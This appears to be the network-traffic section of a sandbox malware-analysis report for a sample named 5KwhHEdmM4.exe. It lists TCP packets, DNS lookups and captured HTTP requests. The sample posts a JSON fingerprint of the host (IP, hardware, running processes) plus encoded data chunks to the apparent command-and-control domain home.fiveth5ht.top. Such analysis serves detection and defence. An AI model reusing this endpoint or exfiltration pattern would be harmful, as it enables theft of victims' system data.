                                                            Dec 27, 2024 15:05:56.882181883 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882260084 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882380009 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882391930 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882477045 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882486105 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882563114 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882579088 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882750034 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882759094 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882811069 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882818937 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882962942 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882972002 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882982016 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.883002043 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.883122921 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.883238077 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.883246899 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.883255959 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.883265018 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.883275032 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.883388996 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.883398056 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.883435011 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.883444071 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.883505106 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.883513927 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.883578062 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.883594036 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.884254932 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:57.000418901 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.000438929 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.000447035 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.000454903 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.000667095 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.000675917 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.000809908 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.000818968 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.000827074 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.000843048 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.000987053 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001105070 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001121044 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001130104 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001137972 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001147032 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001156092 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001163960 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001451015 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001460075 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001468897 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001477003 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001486063 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001502037 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001509905 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001523972 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001795053 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001804113 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001813889 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001821995 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001831055 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001847029 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.001990080 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.002271891 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.002279997 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.002289057 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.002293110 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.002295971 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.002299070 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.002583027 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.002727032 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.002743006 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.002762079 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.002770901 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.002891064 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.002899885 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.003021002 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.003031015 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.003038883 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.003047943 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.003170967 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.003179073 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.003300905 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.003309965 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.003810883 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.004450083 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.004467010 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.004476070 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.004486084 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.004606962 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.004762888 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.004771948 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.004823923 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.004832983 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.004848957 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.004991055 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005000114 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005116940 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005125999 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005135059 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005143881 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005264997 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005273104 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005296946 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005305052 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005429983 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005561113 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005569935 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005578041 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005587101 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005601883 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005724907 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005733967 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005897999 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.005907059 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.006030083 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.006040096 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.006047964 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.006057978 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.006076097 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.006083965 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.006094933 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.006112099 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.006119967 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:57.006129026 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:59.732152939 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:59.732280970 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:59.732352018 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:59.732820988 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:59.852303982 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:59.949297905 CET4970380192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:06:00.068989992 CET80497035.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:06:00.069154024 CET4970380192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:06:00.069539070 CET4970380192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:06:00.188983917 CET80497035.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:06:01.615854979 CET80497035.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:06:01.616005898 CET80497035.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:06:01.616079092 CET4970380192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:06:01.616487980 CET4970380192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:06:01.736109018 CET80497035.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:06:01.823007107 CET4970980192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:06:01.942562103 CET80497095.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:06:01.942641973 CET4970980192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:06:01.943034887 CET4970980192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:06:02.062633991 CET80497095.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:06:03.546766996 CET80497095.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:06:03.547223091 CET80497095.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:06:03.547290087 CET4970980192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:06:03.547457933 CET4970980192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:06:03.666865110 CET80497095.101.3.217192.168.2.7

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 27, 2024 15:05:50.857191086 CET6367753192.168.2.71.1.1.1
                                                            Dec 27, 2024 15:05:50.857289076 CET6367753192.168.2.71.1.1.1
                                                            Dec 27, 2024 15:05:50.994185925 CET53636771.1.1.1192.168.2.7
                                                            Dec 27, 2024 15:05:50.994798899 CET53636771.1.1.1192.168.2.7
                                                            Dec 27, 2024 15:05:54.924309969 CET6368053192.168.2.71.1.1.1
                                                            Dec 27, 2024 15:05:54.924438953 CET6368053192.168.2.71.1.1.1
                                                            Dec 27, 2024 15:05:55.329128981 CET53636801.1.1.1192.168.2.7
                                                            Dec 27, 2024 15:05:55.344059944 CET53636801.1.1.1192.168.2.7
                                                            Dec 27, 2024 15:05:59.809948921 CET6412353192.168.2.71.1.1.1
                                                            Dec 27, 2024 15:05:59.809948921 CET6412353192.168.2.71.1.1.1
                                                            Dec 27, 2024 15:05:59.948041916 CET53641231.1.1.1192.168.2.7
                                                            Dec 27, 2024 15:05:59.948061943 CET53641231.1.1.1192.168.2.7
                                                            Dec 27, 2024 15:06:01.677577972 CET6412553192.168.2.71.1.1.1
                                                            Dec 27, 2024 15:06:01.677731991 CET6412553192.168.2.71.1.1.1
                                                            Dec 27, 2024 15:06:01.821624994 CET53641251.1.1.1192.168.2.7
                                                            Dec 27, 2024 15:06:01.821644068 CET53641251.1.1.1192.168.2.7

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Dec 27, 2024 15:05:50.857191086 CET192.168.2.71.1.1.10x5f24Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                            Dec 27, 2024 15:05:50.857289076 CET192.168.2.71.1.1.10xdb89Standard query (0)httpbin.org28IN (0x0001)false
                                                            Dec 27, 2024 15:05:54.924309969 CET192.168.2.71.1.1.10xc8eStandard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                                            Dec 27, 2024 15:05:54.924438953 CET192.168.2.71.1.1.10x8ba8Standard query (0)home.fiveth5ht.top28IN (0x0001)false
                                                            Dec 27, 2024 15:05:59.809948921 CET192.168.2.71.1.1.10xeb41Standard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                                            Dec 27, 2024 15:05:59.809948921 CET192.168.2.71.1.1.10xc35cStandard query (0)home.fiveth5ht.top28IN (0x0001)false
                                                            Dec 27, 2024 15:06:01.677577972 CET192.168.2.71.1.1.10x288Standard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                                            Dec 27, 2024 15:06:01.677731991 CET192.168.2.71.1.1.10x55f3Standard query (0)home.fiveth5ht.top28IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Dec 27, 2024 15:05:50.994798899 CET1.1.1.1192.168.2.70x5f24No error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                            Dec 27, 2024 15:05:50.994798899 CET1.1.1.1192.168.2.70x5f24No error (0)httpbin.org3.218.7.103A (IP address)IN (0x0001)false
                                                            Dec 27, 2024 15:05:55.329128981 CET1.1.1.1192.168.2.70xc8eNo error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false
                                                            Dec 27, 2024 15:05:59.948061943 CET1.1.1.1192.168.2.70xeb41No error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false
                                                            Dec 27, 2024 15:06:01.821624994 CET1.1.1.1192.168.2.70x288No error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • httpbin.org
                                                            • home.fiveth5ht.top

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.7497015.101.3.217806528C:\Users\user\Desktop\5KwhHEdmM4.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 27, 2024 15:05:55.667896986 CET12360OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                            Host: home.fiveth5ht.top
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 443147
                                                            Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 39 38 32 31 37 36 35 32 39 31 34 30 30 39 31 35 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                                            Data Ascii: { "ip": "8.46.123.189", "current_time": "8598217652914009152", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 632 }, { "name": "svchost.exe", "pid": 748 }, { "name": "fontdrvhost.exe", "pid": 772 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "svchost.exe", "pid": 864 }, { "name": "svchost.exe", "pid": 912 }, { "name": "dwm.exe", "pid": 976 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 704 }, { "name": "svchost.exe", "pid": 860 }, { "name": "svchost.exe" [TRUNCATED]
                                                            Dec 27, 2024 15:05:55.787642002 CET2472OUTData Raw: 47 71 64 43 76 54 64 70 30 36 6e 68 6e 34 76 78 6b 75 71 61 76 77 42 61 55 5a 4c 33 6f 7a 69 33 47 55 57 70 52 62 69 30 33 5c 2f 41 47 76 44 39 6e 58 39 4d 61 70 54 6a 56 70 2b 44 38 5a 30 35 4b 36 6c 48 78 44 38 4b 35 4a 5c 2f 64 78 78 64 4e 62
                                                            Data Ascii: GqdCvTdp06nhn4vxkuqavwBaUZL3ozi3GUWpRbi03\/AGvD9nX9MapTjVp+D8Z05K6lHxD8K5J\/dxxdNbNNJxd00mj8h6K\/Zm2\/4JKC4\/5uB2f90p3f+9JX\/OPWvyi+JHhA\/D34h+PfALagNWPgfxp4p8IHVRamxGpnw1rl9op1AWRuLs2YvTZfaRam7uvs\/meV9om2eY37R4K\/Su8AfpEZlnWT+DvHv+uGY8O4HD5n
                                                            Dec 27, 2024 15:05:55.787709951 CET7416OUTData Raw: 2f 55 72 48 5a 35 6a 75 50 2b 32 63 6b 59 35 39 5c 2f 77 44 50 30 2b 6c 4e 69 33 79 65 54 5c 2f 41 6e 5c 2f 54 50 6a 5c 2f 4f 66 38 38 56 4b 32 5a 4e 36 66 2b 51 5c 2f 38 66 72 5c 2f 6e 69 6f 63 66 77 66 78 2b 56 35 55 76 37 72 5c 2f 6c 33 5c 2f
                                                            Data Ascii: /UrHZ5juP+2ckY59\/wDP0+lNi3yeT\/An\/TPj\/Of88VK2ZN6f+Q\/8fr\/niocfwfx+V5Uv7r\/l3\/z09MV0GhD5m7\/bEkX737R\/n\/D2oWOfbvHz+Z+6lH\/Lf\/PHb+dPk2EIn8ccvPl\/l6f5\/GnyZ2u7\/I\/\/AEzi\/wAfx96DoKbR87N8f1\/z+nXtULF5NiZ\/Hyv8P8\/Wrk0f7zZzs8rzf8cdP61T\/wBW
                                                            Dec 27, 2024 15:05:55.787775993 CET2472OUTData Raw: 35 66 71 64 56 4f 70 38 72 66 68 5c 2f 77 4e 2b 6d 70 43 7a 65 5a 49 2b 39 4e 6c 74 4a 5c 2f 77 41 39 50 39 66 6a 32 36 66 35 2b 6d 61 68 57 54 79 39 37 37 50 6b 38 33 7a 63 66 6c 2b 66 66 50 4e 45 71 75 76 7a 75 6b 63 50 6d 66 38 41 50 54 39 2b
                                                            Data Ascii: 5fqdVOp8rfh\/wN+mpCzeZI+9NltJ\/wA9P9fj26f5+mahWTy977Pk83zcfl+ffPNEquvzukcPmf8APT9+f8\/596fueKPf52zy5fK7+fN2rQ2Ief3KRpI+\/wBeP0\/+vVbd5Z\/57eXz\/wBMO\/5\/l+uKm+Ty3Xf6+bH5Xk\/l\/n8KPnbfD0\/e\/wDPLr+v06VPv\/3fxAhb++vl\/wDPXy5Jv9V\/06\/59fSjy\/3cy
                                                            Dec 27, 2024 15:05:55.787796974 CET2472OUTData Raw: 76 37 61 53 4f 61 78 75 5a 59 5a 6f 72 71 7a 75 59 6d 6a 6d 6a 6e 30 71 59 4b 30 39 70 50 43 7a 78 79 4a 63 51 79 77 53 6f 7a 71 32 35 63 69 76 34 4d 2b 6b 6a 78 33 53 38 50 65 4e 4b 75 42 7a 54 4b 6f 35 31 77 5c 2f 78 64 6c 33 44 47 63 34 7a 41
                                                            Data Ascii: v7aSOaxuZYZorqzuYmjmjn0qYK09pPCzxyJcQywSozq25civ4M+kjx3S8PeNKuBzTKo51w\/xdl3DGc4zAVKGMh7TE5FmWJoVI4LMKOIw1HC4uvhcDTwuK55V5fVKtKUqGlGR\/p79D\/gGv4n+G7x2UZrHI+KODM24uyDA5rCvgqlTC4PiHLMDjKVTGZbXoYqvisJRxmYVsRhHGnh4PFUcRTjiE3Wifmp+xT8TPib8RvBfxhHi
                                                            Dec 27, 2024 15:05:55.787820101 CET2472OUTData Raw: 41 78 4e 53 71 38 4e 54 7a 42 5c 2f 36 61 35 6a 34 65 34 2b 32 51 35 62 78 52 34 61 35 6e 34 68 31 75 45 63 46 68 73 6b 34 66 34 6e 79 44 69 33 4b 73 69 77 32 64 63 50 5a 66 69 63 4e 69 38 6f 77 50 47 32 55 5a 6c 6e 2b 51 54 71 7a 77 74 66 42 34
                                                            Data Ascii: AxNSq8NTzB\/6a5j4e4+2Q5bxR4a5n4h1uEcFhsk4f4nyDi3Ksiw2dcPZficNi8owPG2UZln+QTqzwtfB4LEY3D08JxFl2IxuHqZhhqdP6zUwC539pjxbaftUft5\/srfs2fDK4i8Qab+y58R7b9pP4\/+J9NZLnSfBeteCpbd\/A\/g651CPMf9v3WqK9hq2kwvLLBJr9gk6rLpGuppn5O\/8FWDn9uT4tD+7pXwwH\/mLfBx\
                                                            Dec 27, 2024 15:05:55.787846088 CET2472OUTData Raw: 64 79 68 54 65 6d 50 39 5a 5c 2f 6e 5c 2f 50 66 6f 54 55 4c 52 5c 2f 50 35 4f 7a 7a 6e 6b 5c 2f 77 43 32 5c 2f 76 78 5c 2f 6e 36 31 63 62 5a 73 2b 5c 2f 47 69 66 36 71 53 54 5c 2f 77 42 74 63 64 65 6e 72 39 4b 68 2b 63 52 75 6d 2b 4e 33 6b 37 69
                                                            Data Ascii: dyhTemP9Z\/n\/PfoTULR\/P5Ozznk\/wC2\/vx\/n61cbZs+\/Gif6qST\/wBtcdenr9Kh+cRum+N3k7iK19P8f8+nQdBWk2eU8Sf8s\/8AWx\/8tx3\/ANLu8+nHtTJI1WZ0\/ebJP+Wkn7+fr\/L+dTAfu4U2XH\/bP9\/b\/n\/npTP77\/vE7+Z\/7a\/546UHQQ+X5iv5KfPnzR+6+vI\/z+GaI4\/ufPGPM\/5Z+V\/5
                                                            Dec 27, 2024 15:05:55.787957907 CET2472OUTData Raw: 34 48 45 52 74 57 77 4f 59 55 73 4a 6a 73 4a 58 6a 31 56 58 44 59 6d 4e 57 6a 56 6a 5a 37 54 68 4a 61 2b 5a 34 6d 56 34 7a 69 4c 49 4d 62 52 7a 58 4a 4d 56 6e 57 53 35 6a 68 5a 4b 57 48 7a 4c 4b 36 32 4f 79 37 47 34 65 62 61 73 36 4f 4d 77 6b 71
                                                            Data Ascii: 4HERtWwOYUsJjsJXj1VXDYmNWjVjZ7ThJa+Z4mV4ziLIMbRzXJMVnWS5jhZKWHzLK62Oy7G4ebas6OMwkqNejJvls4VItu1uh9reGf20\/i1omnT6Vq1zH4ksJ7WS1ZL2QRzYdCgf7RPBfsnl5ysVqLWED5TGQF2+GeKPiz4w8WvKt\/qdxFYyFsafHM0FoEPRJIYBDBNtHAkkh39csSzbvJtA1LSfFPjL4f+A9E8Q+F28Q\/Ev
                                                            Dec 27, 2024 15:05:55.787980080 CET2472OUTData Raw: 39 6f 32 6d 58 74 31 5a 54 33 4f 6a 33 75 70 61 56 4a 5a 36 6a 64 50 72 37 5c 2f 41 43 76 4d 38 42 6e 57 58 59 4c 4e 73 71 78 56 4c 48 5a 62 6d 4f 47 70 59 7a 41 34 79 67 32 36 4f 4a 77 74 65 43 71 55 61 39 4a 74 4a 75 6e 55 67 31 4b 4c 73 72 70
                                                            Data Ascii: 9o2mXt1ZT3Oj3upaVJZ6jdPr7\/ACvM8BnWXYLNsqxVLHZbmOGpYzA4yg26OJwteCqUa9JtJunUg1KLsrppn5TnGT5nw\/muYZJnODrZfm2VYutgcxwOIUVXwmLw83Tr4esoylFVKU04zSk7STXQKa\/3T+H8xTq53x94s8HfDbwBY+NPGHxL+FvhvXvEXhDWviH4E+E3iDWvG9n8SPiB4A0HxXrHgq\/8WeHbrTfhxrPwq063f
                                                            Dec 27, 2024 15:05:55.907398939 CET4944OUTData Raw: 76 34 6a 4b 6a 6b 37 66 6a 5c 2f 41 45 71 53 69 67 6f 72 30 56 4a 5c 2f 79 30 5c 2f 7a 5c 2f 64 71 4f 67 41 71 4f 54 74 2b 50 39 4b 6b 6f 6f 4f 67 72 30 55 55 55 41 4e 66 37 70 5c 2f 44 2b 59 71 47 72 46 52 50 31 5c 2f 44 2b 70 6f 4f 67 5a 52 52
                                                            Data Ascii: v4jKjk7fj\/AEqSigor0VJ\/y0\/z\/dqOgAqOTt+P9KkooOgr0UUUANf7p\/D+YqGrFRP1\/D+poOgZRRRQBC\/3j+H8hTae\/X8P6mmUHQRmP0\/EH\/P6YqF\/un8P5irVQv8AeP4fyFAFWipn+6fw\/mKZt+XPfr+H+ef0roOgZUL\/AHj+H8hU1FAFein7D7f5\/CmlSv8A9ag6BKr1YqE9X\/H\/ANCFBpT6\/L9RtV6s
                                                            Dec 27, 2024 15:05:55.907483101 CET4944OUTData Raw: 38 61 4c 4c 39 76 6a 51 76 69 48 38 56 66 47 48 6a 54 34 76 65 4e 50 48 58 67 4c 34 76 66 43 32 79 2b 43 5c 2f 69 47 39 5c 2f 59 30 38 66 36 78 66 65 41 4e 65 38 41 36 44 34 56 31 76 39 71 48 77 4a 6f 6e 78 46 2b 46 66 69 7a 34 64 77 57 4e 72 72
                                                            Data Ascii: 8aLL9vjQviH8VfGHjT4veNPHXgL4vfC2y+C\/iG9\/Y08f6xfeANe8A6D4V1v9qHwJonxF+Ffiz4dwWNrrEnhHT\/BtzpHrs\/h3w\/dSNNc6Fo9xM33pZ9MspZG\/3nkgZj+Jo\/4R7QA6SDQ9HEkZzG\/9mWW+MnqUbyNyk4HKkHivVq\/RByivmmU5hV4xznkynMcxx8KdKnhaVfFf2lmFPHVsPisZ7CdevRpqnGjT+tyxla
                                                            Dec 27, 2024 15:05:59.732152939 CET157INHTTP/1.1 200 OK
                                                            Server: nginx/1.22.1
                                                            Date: Fri, 27 Dec 2024 14:05:59 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 1
                                                            Connection: close
                                                            Data Raw: 30
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.7497035.101.3.217806528C:\Users\user\Desktop\5KwhHEdmM4.exe
                                                            TimestampBytes transferredDirectionData
